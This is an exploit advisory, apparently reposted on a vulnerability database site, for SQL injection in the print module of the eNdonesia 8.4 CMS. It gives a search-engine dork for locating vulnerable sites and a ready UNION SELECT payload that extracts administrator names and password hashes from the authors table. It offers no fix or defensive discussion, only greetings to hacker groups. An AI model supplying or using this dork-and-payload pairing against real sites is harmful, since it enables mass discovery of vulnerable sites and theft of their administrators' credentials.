======================================================================/ eNdonesia 8.4 (Print Module) SQL Injection Vulnerability Download : http://sourceforge.net/projects/endonesia/files/eNdonesia Version : 8.4 or lower maybe also affected Dork : mod.php?mod=publisher&op=printarticle&artid= ======================================================================/ Author : vYc0d Contact : vyc0d@hackermail.com Site : http://vyc0d.uni.cc Date : 15-10-2010 ==============================================================================================/ [Vulnerability File] http://localhost/[eNdonesia 8.4]/mod.php?mod=publisher&op=printarticle&artid=[valid id][sql-i] [ DEMO ] http://www.site.com/mod.php?mod=publisher&op=printarticle&artid=-47+union+select+1,concat_ws%280x3a,aid,name,pwd%29,3,4,5,6,7+from+authors-- ===================================================================================================================================================/ [ Thanks to ] [-] Allah SWT, Muhammad SAW, My Family [-] The big Family of : [-] M0slem Hax0r - Echo - Indonesian Coder - Jasakom - Indonesian Hackers - Malang Cyber Crew [-] ManadoCoding - Devilzc0de - Yogyacarderlink - Xcode - Hacker Newbie - Persiland Security [-] Klix ITN Malang - Kolam (Komunitas Linux Arek Malang)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论